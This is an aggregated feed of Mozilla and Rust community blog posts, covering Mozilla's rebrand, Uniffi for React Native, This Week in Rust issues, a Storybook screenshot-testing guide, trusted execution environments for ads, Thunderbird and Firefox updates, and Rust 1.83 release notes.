“Mozilla isn’t your typical tech brand; it’s a trailblazing, activist organization in both its mission and its approach,” said Lisa Smith, global executive creative director at JKR. “The new brand presence captures this uniqueness, reflecting Mozilla’s refreshed strategy to ‘reclaim the internet.’ The modern, digital-first identity system is all about building real brand equity that drives innovation, acquisition and stands out in a crowded market.”

Our transition to the new brand is already underway, but we’re not done yet. We see this brand effort as an evolving process that we will continue to build and iterate on over time, with all our new efforts now aligned to this refreshed identity. This evolution brings advancements in AI, product growth and support for groundbreaking ventures. Stay tuned for upcoming campaigns and find out more at www.mozilla.org/en-US/

Curious to learn more about this project or JKR? Head over to www.jkrglobal.com

The word "Mozilla" displayed in bold, modern black typography on a white background, aligned with a precise grid system that emphasizes balance and structure.

The post Reclaim the internet: Mozilla’s rebrand for the next era of tech appeared first on The Mozilla Blog.

Hacks.Mozilla.Org: Introducing Uniffi for React Native: Rust-Powered Turbo Modules

Today Mozilla and Filament are releasing Uniffi for React Native, a new tool we’ve been using to build React Native Turbo Modules in Rust, under an open source license. This allows millions of developers writing cross-platform React Native apps to use Rust – a modern programming language known for its safety and performance benefits – to build single implementations of their app’s core logic that work seamlessly across iOS and Android. 

This is a big win for us and for Filament who co-developed the library with Mozilla and James Hugman, the lead developer. We think it will be awesome for many other developers too. Less code is good. Memory safety is good. Performance is good. We get all three, plus the joy of using a language we love in more places.

For those familiar with React Native, it’s a great framework for creating cross-platform apps, but it has its challenges. React Native apps rely on a single JavaScript thread, which can slow things down when handling complex tasks. Developers have traditionally worked around this by writing code twice – once for iOS and once for Android – or by using C++, which can be difficult to manage. Uniffi for React Native offers a better solution by enabling developers to offload heavy tasks to Rust, which is now easy to integrate with React Native. As a result, you’ve got faster, smoother apps and a streamlined development process.

How Uniffi for React Native works

Uniffi for React Native is a UniFFI bindings generator for using Rust from React Native via Turbo Modules. It lets us work at an abstraction level high enough to stay focused on our application’s needs rather than getting lost in the gory technical details of bespoke native cross-platform development. It provides tooling to generate:

  • Typescript and JSI C++ to call Rust from Typescript and back again
  • A Turbo-Module that installs the bindings into a running React Native library.
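
To give a feel for what this looks like from the JavaScript side, here is a minimal, hypothetical sketch in TypeScript. The module name (my-rust-lib), the exported add function, and the generated package layout are made-up placeholders; the real names come from your Rust crate and the bindings the tooling generates for it.

// Illustrative only: assumes a Rust crate that exposes
//   #[uniffi::export] fn add(a: u32, b: u32) -> u32
// and that bindings for it were generated into a hypothetical
// 'my-rust-lib' Turbo Module package.
import { add } from 'my-rust-lib';

export function sumOnTheRustSide(a: number, b: number): number {
  // The call crosses the JSI boundary into Rust; long-running work can
  // instead be exposed as async Rust functions that surface as Promises.
  return add(a, b);
}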

We’re stoked about this work continuing. In 2020, we started with Uniffi as a modern day ‘write once; run anywhere’ toolset for Rust. Uniffi has come a long way since we developed the technology as a bit of a hack to get us a single implementation of Firefox Sync’s core (in Rust) that we could then deploy to both our Android and iOS apps! Since then Mozilla has used uniffi-rs to successfully deploy Rust in mobile and desktop products used by hundreds of millions of users. This Rust code runs important subsystems such as bookmarks and history sync, Firefox Suggest, telemetry and experimentation. Beyond Mozilla, Uniffi is used in Android (in AOSP), high-profile security products and some complex libraries familiar to the community.

Currently the Uniffi for React Native project is an early release. We don’t have a cool landing page or examples in the repo (coming!), but open source contributor Johannes Marbach has already been sponsored by Unomed to use Uniffi for React Native to create a React Native library for the Matrix SDK.

Need an idea on how you might give it a whirl? I’ve got two uses that we’re very excited about:

1) Use Rust to offload computationally heavy code to a multi-threaded/memory-safe subsystem to escape single-threaded JS performance bottlenecks in React Native. If you know, you know.

2) Leverage the incredible library of Rust crates in your React Native app. One of the Filament devs showed how powerful this is, recently. With a rudimentary knowledge of Rust, they were able to find a fast blurhashing library on crates.io to replace a slow Typescript implementation and get it running the same day. We’re hoping we can really improve the tooling even more to make this kind of optimization as easy as possible.

Uniffi represents a step forward in cross-platform development, combining the power of Rust with the flexibility of React Native to unlock new possibilities for app developers. 

We’re excited to have the community explore what’s possible. Please check out the library on GitHub and jump into the conversation on Matrix.

Disclosure: in addition to this collaboration, Mozilla Ventures is an investor in Filament. 

 

The post Introducing Uniffi for React Native: Rust-Powered Turbo Modules appeared first on Mozilla Hacks - the Web developer blog.

This Week in Rust: This Week in Rust 576

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is augurs, a time-series toolkit for Rust with bindings to JS & Python.

Thanks to Ben Sully for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

  • RustWeek 2025 | Closes 2025-01-12 | Utrecht, The Netherlands | Event date: 2025-05-13

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

488 pull requests were merged in the last week

Rust Compiler Performance Triage

Busy week with more PRs impacting performance than is typical. Luckily performance improvements outweighed regressions in real world benchmarks with the largest single performance gain coming from a change to no longer unconditionally do LLVM IR verification in debug builds which was just wasted work.

Triage done by @rylev. Revision range: 7db7489f..490b2cc0

Summary:

(instructions:u)             mean    range             count
Regressions ❌ (primary)      0.5%    [0.2%, 1.9%]      58
Regressions ❌ (secondary)    1.1%    [0.2%, 5.1%]      85
Improvements ✅ (primary)    -2.3%    [-8.2%, -0.2%]    116
Improvements ✅ (secondary)  -2.5%    [-8.9%, -0.1%]    55
All ❌✅ (primary)            -1.4%    [-8.2%, 1.9%]     174

6 Regressions, 6 Improvements, 5 Mixed; 5 of them in rollups
49 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-12-04 - 2025-01-01 🦀

Virtual
Africa
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

"self own" sounds like a rust thing

ionchy on Mastodon

Thanks to Jacob Pratt for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Tiger Oakes: How to fix Storybook screenshot testing

As an alternative to Chromatic, I’ve been using Storybook’s Test Runner to power screenshot tests for Microsoft Loop. We configure the test runner to run in CI and take a screenshot of every story. However, the initial implementation based on the official Storybook docs was very flaky due to inconsistent screenshots of the same story. Here are some tips to reduce flakiness in your Storybook screenshot tests.

The Storybook Test Runner configuration

<figcaption class="header">.storybook/test-runner.js</figcaption>
import * as path from 'node:path';
import { getStoryContext, waitForPageReady } from '@storybook/test-runner';
/**
* @type {import('@storybook/test-runner').TestRunnerConfig}
*/
const config = {
async preVisit(page) {
await page.emulateMedia({ reducedMotion: 'reduce' });
},
async postVisit(page, context) {
const { tags, title, name } = await getStoryContext(page, context);
if (!tags.includes('no-screenshot')) {
// Wait for page idle
await waitForPageReady(page);
await page.evaluate(
() => new Promise((resolve) => window.requestIdleCallback(resolve))
);
// Wait for images to load
await page.waitForFunction(() =>
Array.from(document.images).every((i) => i.complete)
);
// INFO: '/' or "\\" in screenshot name creates a folder in screenshot location.
// Replacing with '-'
const ssNamePrefix = `${title}.${name}`
.replaceAll(path.posix.sep, '-')
.replaceAll(path.win32.sep, '-');
await page.screenshot({
path: path.join(
process.cwd(),
'dist/screenshots',
`${ssNamePrefix}.png`
),
animations: 'disabled',
caret: 'hide',
mask: [
page.locator('css=img[src^="https://res.cdn.office.net/files"]'),
],
});
}
},
};
export default config;

This configuration essentially tells Storybook to run page.screenshot after each story loads, using the postVisit hook. As the Test Runner is based on Playwright, we can use Playwright’s screenshot function to take pictures and save them to disk.

Disable animations

One source of inconsistency in screenshot tests is animation, as the screenshot will be taken at slightly different times. Luckily, Playwright has a built-in option to disable animations.

<figcaption class="header"></figcaption>
await page.screenshot({
animations: 'disabled',
caret: 'hide',
});

Additionally, we can use the prefers-reduced-motion media query to use CSS designed for no motion. (You are writing CSS for reduced motion, right?) This can be configured when the page is loaded in the preVisit hook.

<figcaption class="header"></figcaption>
async function preVisit(page) {
await page.emulateMedia({ reducedMotion: 'reduce' });
}

Wait for images to load

Since images are a separate network request, they might not be loaded when the screenshot is taken. We can get a list of all the image elements on the page and wait for them to complete.

<figcaption class="header"></figcaption>
// waitForFunction waits for the function to return a truthy value
await page.waitForFunction(() =>
// Get list of images on the page
Array.from(document.images)
// return true if .complete is true for all images
.every((i) => i.complete)
);

However, we still ended up with some issues for images that load over the internet instead of from the disk. To fix this, we can mask out specific elements from the screenshot using the mask option. I wrote a CSS selector for images loaded from the Office CDN.

<figcaption class="header"></figcaption>
await page.screenshot({
mask: [page.locator('css=img[src^="https://res.cdn.office.net/files"]')],
});

Try to figure out if the page is idle

Storybook Test Runner includes a helper waitForPageReady function that waits for the page to be loaded. We also wait for the browser to be in an idle state using requestIdleCallback.

<figcaption class="header"></figcaption>
import { waitForPageReady } from '@storybook/test-runner';
await waitForPageReady(page);
await page.evaluate(
() => new Promise((resolve) => window.requestIdleCallback(resolve))
);

Both of these feel more like vibes than guarantees, but they can help reduce flakiness.

Custom assertions in stories

The above configuration gives a good baseline, but you’ll likely end up with one-off issues in specific stories (especially if React Suspense or lazy loading is involved). In these cases, you can add custom assertions to the story itself! Storybook Test Runner waits until the play function in the story is resolved, so you can add assertions there.

<figcaption class="header">Component.stories.js</figcaption>
import { expect, within } from '@storybook/test';
export const SomeStory = {
async play({ canvasElement }) {
const canvas = within(canvasElement);
await expect(
await canvas.findByText('Lazy loaded string')
).toBeInTheDocument();
},
};

Future Vitest support

Storybook is coming out with a brand-new Test addon based on Vitest. It doesn’t support Webpack loaders, so we can’t use it for Microsoft Loop yet, but it’s something to keep an eye on. Vitest will run in browser mode on top of Playwright, so the page object will still be available.

<figcaption class="header"></figcaption>
import { page } from '@vitest/browser/context';

The Mozilla Blog: Using trusted execution environments for advertising use cases

This article is the next in a series of posts we’ll be doing to provide more information on how Anonym’s technology works.  We started with a high level overview, which you can read here.

Mozilla acquired Anonym over the summer of 2024, as a key pillar to raise the standards of privacy in the advertising industry. These privacy concerns are well documented, as described in the US Federal Trade Commission’s recent report. Separate from Mozilla surfaces like Firefox, which work to protect users from invasive data collection, Anonym is ad tech infrastructure that focuses on improving privacy measures for data commonly shared between advertisers and ad networks. A key part of this process is where that data is sent and stored. Instead of advertisers and ad networks sharing personal user data with each other, they encrypt it and send it to Anonym’s Trusted Execution Environment.  The goal of this approach is to unlock insights and value from data without enabling the development of cross-site behavioral profiles based on user-level data.

A trusted execution environment (TEE) is a technology for securely processing sensitive information in a way that protects code and data from unauthorized access and modification. A TEE can be thought of as a locked down environment for processing confidential information. The term enclave refers to the secure memory portion of the trusted execution environment.

Why TEEs?

TEEs improve on standard compute infrastructure due to:

  • Confidentiality – Data within the TEE is encrypted and inaccessible outside the TEE, even if the underlying system is compromised. This ensures that sensitive information remains protected.
  • Attestation – TEEs can provide cryptographic proof of their identity and the code they intend to execute. This allows other parts of the system to verify that the TEE is trustworthy before interacting with it and ensures only authorized code will process sensitive information.

Because humans can’t access TEEs to manipulate the code, Anonym’s system requires that all the operations that must be performed on the data be programmed in advance. We do not support arbitrary queries or real-time data manipulation. While that may sound like a drawback, it offers two material benefits. First, it ensures that there are no surprises. Our partners know with certainty how their data will be processed. Anonym and its partners cannot inadvertently access or share user data. Second, this hardened approach also lends itself to highly repeatable use cases. In our case, for example, this means ad platforms can run a measurement methodology repeatedly with many advertisers without needing to approve the code each time knowing that by design, the method and the underlying data are safe.

TEEs in Practice

Today, Anonym uses hardware-based Trusted Execution Environments (TEEs) based on Intel SGX offered by Microsoft Azure. We believe Intel SGX is the most researched and widely deployed approach to TEEs available today.

When working with our ad platform partners, Anonym develops the algorithm for the specific advertising application. For example, if an advertiser is seeking to understand whether and which ads are driving the highest business value, we will customize our attribution algorithm to align with the ad platform’s standard approach to attribution. This includes creating differentially private output to protect data subjects from reidentification. 

Prior to running any algorithm on partner data, we provide our partners with documentation and source code access through our Transparency Portal, a process we refer to as binary review. Once our partners have reviewed a binary, they can approve it using the Transparency Portal. If, at any time, our partners want to disable Anonym’s ability to process data, they can revoke approval.

Each ‘job’ processed by Anonym starts with an ephemeral TEE being spun up. Encrypted data from our partners is pulled into the TEE’s encrypted memory. Before the data can be decrypted, the TEE must verify its identity and integrity. This process is referred to as attestation. Attestation starts with the TEE creating cryptographic evidence of its identity and the code it intends to run (similar to a hash). The system will compare that evidence to what has been approved for each partner contributing data. Only if this attestation process is successful will the TEE be able to decrypt the data. If the cryptographic signature of the binary does not match the approved binary, the TEE will not get access to the keys to decrypt and will not be able to process the data. 

Attestation ensures our partners have control of their data, and can revoke access at any point in time. It also ensures Anonym enclaves never have access to sensitive data without customer visibility.  We do this by providing customers with a log that records an entry any time a customer’s data is processed.
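
To make the idea concrete, here is a purely illustrative sketch in Rust (not Anonym's implementation) of the shape of an attestation gate: the enclave's measured code hash has to match a binary the partner has approved before any decryption key can be released.

// Illustrative only: a stand-in for the attestation check described above.
// Keys are released only when the enclave's measurement matches an approved binary.
fn attestation_passes(measurement: &[u8; 32], approved_binaries: &[[u8; 32]]) -> bool {
    approved_binaries.iter().any(|approved| approved == measurement)
}

fn main() {
    let measurement = [0x42u8; 32]; // stand-in for the enclave's measured code hash
    let approved = [[0x42u8; 32]];  // stand-in for the partner-approved binary hashes
    if attestation_passes(&measurement, &approved) {
        println!("attestation succeeded: decryption keys may be released");
    } else {
        println!("attestation failed: data stays encrypted");
    }
}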

Once the job is complete and the anonymized data is written to storage, the TEE is spun down and the data within it is destroyed. The aggregated and differentially private output is then shared with our partners. 

We hope this overview has been helpful. Our next blog post will walk through Anonym’s approach to transparency and control through our Transparency Portal.

The post Using trusted execution environments for advertising use cases appeared first on The Mozilla Blog.

Mozilla Thunderbird: Thunderbird Monthly Development Digest – November 2024

Hello Thunderbird Community! Another adventurous month is behind us, and the team has emerged victorious from a number of battles with code, quirks, bugs and performance issues. Here’s a quick summary of what’s been happening across the front and back end teams as some of the team heads into US Thanksgiving:

Exchange Web Services support in Rust

November saw an increase both in the number of team members contributing to the project and in the number of features shipped! Users on our Daily release channel can help to test newly-released features such as copying and moving messages from EWS to another protocol, marking a message as read/unread, and local storage functionality. Keep track of feature delivery here.

If you aren’t already using Daily or Beta, please consider downloading to get early access to new features and fixes, and to help us uncover issues early.

Account Hub

Development of a refreshed account hub has reached the end of an important initial stage, so it is entering QA review next week while we spin up tasks for phase 2 – taking place in the last few weeks of the year. Meta bug & progress tracking.

Global Database & Conversation View

Work to implement a long term database replacement is moving ahead despite some team members being held up in firefighting mode on regressions from patches which landed almost a year ago. Preliminary patches on this large-scale project are regularly pumped into the development ecosystem for discussion and review, with the team aiming to be back to full capacity before the December break.

In-App Notifications

With phase 1 of this project now complete, we’ve uplifted the feature to 134.0 Beta and notification tests will be activated this week. Phase 2 of the project is well underway, with some features accelerated and uplifted to form part of our phase 1 testing plan.  Meta Bug & progress tracking.

Folder & Message Corruption

Some of the code we manage is now 20 years old and efforts are constantly under way to modernize, standardize and make things easier to maintain in the future. While this process is very rewarding, it often comes with unforeseen consequences which only come to light when changes are exposed to the vast number of users on our “ESR” channel who have edge cases and ways of using Thunderbird that are hard to recreate in our limited test environments.

The past few months have been difficult for our development team as they have responded to a wide range of issues related to message corruption. After a focused team effort, and help from a handful of dedicated users and saintly contributors, we feel that we have not only corrected any issues that were introduced during our recent refactoring, but also uncovered and solved problems that have been plaguing our users for years. And long may that continue! We’re here to improve things!

New Features Landing Soon

Several requested features have reached our Daily users and include…

If you want to see things as they land, and help squash early bugs, you can check the pushlog and try running daily. This would be immensely helpful for catching things early.

See you next month.

Toby Pilling

Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest – November 2024 appeared first on The Thunderbird Blog.

Firefox Nightly: Announcing Faster, Lighter Firefox Downloads for Linux with .tar.xz Packaging!

We’re excited to announce an improvement for our Linux users that enhances both performance and compatibility with various Linux distributions.

Switching to .tar.xz Packaging for Linux Builds

In our ongoing effort to optimize Firefox for all users, we are transitioning the packaging format of Firefox for Linux from .tar.bz2 to .tar.xz (utilizing the LZMA compression algorithm). This change results in smaller download sizes and faster decompression times, making your experience smoother and more efficient.

What This Means for You

  • Smaller Downloads: The Firefox .tar.xz packages are, on average, 25% smaller than their .tar.bz2 counterparts. This means quicker downloads, saving you time and bandwidth.
  • Faster Installation: With improved decompression speeds, installing Firefox on Linux will be faster than ever. The .tar.xz format decompresses more than twice as fast as .tar.bz2, allowing you to get up and running in no time.
  • Enhanced Compatibility: Modern Linux distributions support the .tar.xz format. This switch aligns Firefox with the standards of the Linux community, ensuring better integration and compatibility.
  • No Action Required for Current Users: If you already have Firefox installed on your computer, there’s nothing you need to do. Firefox will continue to operate and update as usual.

Accessing the New Packages

(Re)installing Firefox? Just curious about testing out the compression?

Starting today, November 27th, 2024 you can find the new .tar.xz archives on our downloads page. Simply select the Firefox Nightly for Linux that you desire, and you’ll receive the new packaging format.

Maintaining Firefox on your favorite Linux distribution?

For package maintainers or scripts that reference our download links, please note that this packaging change is currently implemented in Firefox Nightly and will eventually roll out to the Beta and Release channels in the weeks to come.

To maintain uninterrupted updates now and in the future, we recommend updating your scripts to handle both .tar.bz2 and .tar.xz extensions, or switching to .tar.xz format when it becomes available in your preferred channel.

Why does Firefox use .tar.xz instead of Zstandard (.zst) for Linux releases?

While Zstandard is slightly faster to decompress, we chose .tar.xz because it offers better compression, reducing download sizes and saving bandwidth. Additionally, .tar.xz is widely supported across Linux systems, ensuring compatibility without extra dependencies.

For more details on how the decision was made, please refer to bug 1710599.

We Value Your Feedback

Your input is crucial to us. We encourage you to download the new .tar.xz packaged builds, try them out, and let us know about your experience.

  • Report Issues: If you encounter any bugs or problems, please report them through Bugzilla.
  • Stay Connected: Join the discussion and share your thoughts with the Firefox Nightly community. Your feedback helps us improve and tailor Firefox to better meet your needs.

Thank You for Your Support

We appreciate your continued participation in the Firefox Nightly community. Together, we’re making Firefox better every day. Stay tuned for more updates, and happy browsing!

Tiger Oakes: 2024 JS Rap Up

To open JSNation US 2024, Daphne asked me to help write a rap to recap the year in JavaScript news, parodying mrgrandeofficial. Here’s what I came up with (with info from Frontend Focus, TC39 meetings, and lots of web searches)!

Thanks to rappers CJ Reynolds, Daphne Oakes, Henri Helvetica, and Beau Carnes - aka Hip Hop Array!


The Script

11 months into 2024…
let’s recap Javascript once more

January

iOS gets new browser engines
Apple creates PWA tension

February

React Labs drops a big update
Transferable buffers come out the gate

March

JSR comes alive
World Wide Web turns 35

April

Node 22 gives us module require()
ESLint 9 sets configs on fire

May

React 19 enters RC
SolidStart 1 adds simplicity

June

This year’s spec is ratified
JSNation on the EU side

July

Ladybird browser enters the race
Node tries type stripping whitespace

August

rspack 1 hits 1.0
telling webpack you’re too slow

September

Tell Oracle: drop JS trademark
So we can leave ECMAScript in the dark

October

Here comes NextJS 15
Deno 2, Svelte 5 - so fresh so clean

November

Bluesky rising, Twitter’s outcast
CSS gets a logo at last

JSNation will be a blast!

The Rust Programming Language Blog: Announcing Rust 1.83.0

The Rust team is happy to announce a new version of Rust, 1.83.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.83.0 with:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.83.0.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.83.0 stable

New const capabilities

This release includes several large extensions to what code running in const contexts can do. This refers to all code that the compiler has to evaluate at compile-time: the initial value of const and static items, array lengths, enum discriminant values, const generic arguments, and functions callable from such contexts (const fn).

References to statics. So far, const contexts except for the initializer expression of a static item were forbidden from referencing static items. This limitation has now been lifted:

static S: i32 = 25;
const C: &i32 = &S;

Note, however, that reading the value of a mutable or interior mutable static is still not permitted in const contexts. Furthermore, the final value of a constant may not reference any mutable or interior mutable statics:

static mut S: i32 = 0;

const C1: i32 = unsafe { S };
// error: constant accesses mutable global memory

const C2: &i32 = unsafe { &S };
// error: encountered reference to mutable memory in `const`

These limitations ensure that constants are still "constant": the value they evaluate to, and their meaning as a pattern (which can involve dereferencing references), will be the same throughout the entire program execution.

That said, a constant is permitted to evaluate to a raw pointer that points to a mutable or interior mutable static:

static mut S: i32 = 64;
const C: *mut i32 = &raw mut S;

Mutable references and pointers. It is now possible to use mutable references in const contexts:

const fn inc(x: &mut i32) {
    *x += 1;
}

const C: i32 = {
    let mut c = 41;
    inc(&mut c);
    c
};

Mutable raw pointers and interior mutability are also supported:

use std::cell::UnsafeCell;

const C: i32 = {
    let c = UnsafeCell::new(41);
    unsafe { *c.get() += 1 };
    c.into_inner()
};

However, mutable references and pointers can only be used inside the computation of a constant; they cannot become part of the final value of the constant:

const C: &mut i32 = &mut 4;
// error[E0764]: mutable references are not allowed in the final value of constants

This release also ships with a whole bag of new functions that are now stable in const contexts (see the end of the "Stabilized APIs" section).

These new capabilities and stabilized APIs unblock an entire new category of code to be executed inside const contexts, and we are excited to see how the Rust ecosystem will make use of this!
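
As a small taste of that, here is an illustrative sketch (not taken from the release notes) that uses a const fn with a mutable reference to fill a lookup table in place at compile time:

// Illustrative example: mutable references in const fn allow in-place
// construction of a table that is fully computed at compile time.
const fn fill_squares(table: &mut [u32; 8]) {
    let mut i = 0;
    while i < table.len() {
        table[i] = (i as u32) * (i as u32);
        i += 1;
    }
}

const SQUARES: [u32; 8] = {
    let mut table = [0u32; 8];
    fill_squares(&mut table);
    table
};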

Stabilized APIs

These APIs are now stable in const contexts:

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.83.0

Many people came together to create Rust 1.83.0. We couldn't have done it without all of you. Thanks!

The Mozilla Blog: Celebrating 20 years of Firefox with 20 red panda cams

A red panda video displayed in Firefox’s Picture-in-Picture mode, with the pop-out video icon visible in the corner. Caption: Spot the picture-in-picture icon — your key to multitasking with a red panda buddy on your screen.

Firefox turns 20 this year, so here’s a bit of history: When Mozilla set out to brainstorm a new browser name, the team played with combinations of animals and natural elements. “Fire” and “fox” got paired on a whiteboard, and a quick web search turned up red pandas — known locally as “firefoxes.” They were unique, rare and perfect for us.

Today, we’re celebrating that connection by partnering with the Red Panda Network to help raise awareness for the protection of these remarkable creatures and their Himalayan habitat. Red pandas play a crucial role in their ecosystem, helping sustain one of the world’s most biodiverse regions, filled with endangered species.

In true “firefox” spirit, we’ve handpicked 20 red panda cams for you to enjoy. Watch as they climb through treetops, snack on bamboo, and stretch, scratch and relax in their habitats.

By the way, you can keep these “firefoxes” on your screen all day with Firefox’s picture-in-picture feature, which lets you pop a video out of its webpage and pin it anywhere while you juggle other pages, tabs or apps. (Try it with Zoo Knoxville’s red panda cam below by clicking the picture-in-picture icon: a square icon with a smaller square and an arrow pointing outward.)

Let’s be honest, it’s been a year. Who can’t use more red pandas in their life? It’s also our way of honoring 20 years of Firefox — and the rare, resilient creatures we share a name with. After all, they’ve always been part of our story. 

Get Firefox

Get the browser that protects what’s important

The post Celebrating 20 years of Firefox with 20 red panda cams appeared first on The Mozilla Blog.

Spidermonkey Development Blog: SpiderMonkey Newsletter (Firefox 132-134)

Hello! Welcome to another episode of the SpiderMonkey Newsletter. I’m your host, Matthew Gaudet.

In the spirit of the upcoming season, let’s talk turkey. I mean, monkeys. I mean SpiderMonkey.

Today we’ll cover a little more ground than the normal newsletter.

If you haven’t already read Jan’s wonderful blog about how he managed to improve Wasm compilation speed by 75x on large modules, please take a peek. It’s a great story of how O(n^2) is the worst complexity – fast enough to seem OK in small cases, and slow enough to blow up horrendously when things get big.

🚀 Performance

👷🏽‍♀️ New features & In Progress Standards Work

🚉 SpiderMonkey Platform Improvements

This Week In Rust: This Week in Rust 575

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is postcard, a battle-tested, well-documented #[no_std] compatible serializer/deserializer geared towards use in embedded devices.

Thanks to Reto Trappitsch for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.


Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

405 pull requests were merged in the last week

Rust Compiler Performance Triage

This week saw more regressions than improvements, mostly due to three PRs that performed internal refactorings that are necessary for further development and modification of the compiler.

Triage done by @kobzol. Revision range: 7d40450b..7db7489f

Summary:

(instructions:u)             mean    range            count
Regressions ❌ (primary)      0.6%    [0.1%, 3.6%]     57
Regressions ❌ (secondary)    0.6%    [0.0%, 2.7%]     100
Improvements ✅ (primary)    -0.5%    [-1.5%, -0.2%]   11
Improvements ✅ (secondary)  -0.4%    [-0.5%, -0.3%]   7
All ❌✅ (primary)            0.4%    [-1.5%, 3.6%]    68

4 Regressions, 2 Improvements, 3 Mixed; 3 of them in rollups. 40 artifact comparisons made in total.

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust
Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-11-27 - 2024-12-25 🦀

Virtual
Africa
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Will never stop being positively surprised by clippy

error: hypothenuse can be computed more accurately
   --> src/main.rs:835:5
    |
835 |     (width * width + height * height).sqrt() / diag
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ help: consider using `width.hypot(height)`
    |
    = help: for further information, visit https://rust-lang.github.io/rust-clippy/master/index.html#imprecise_flops

llogiq is quite self-appreciative regarding his suggestion.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Rust Programming Language Blog: Rust 2024 call for testing

Rust 2024 call for testing

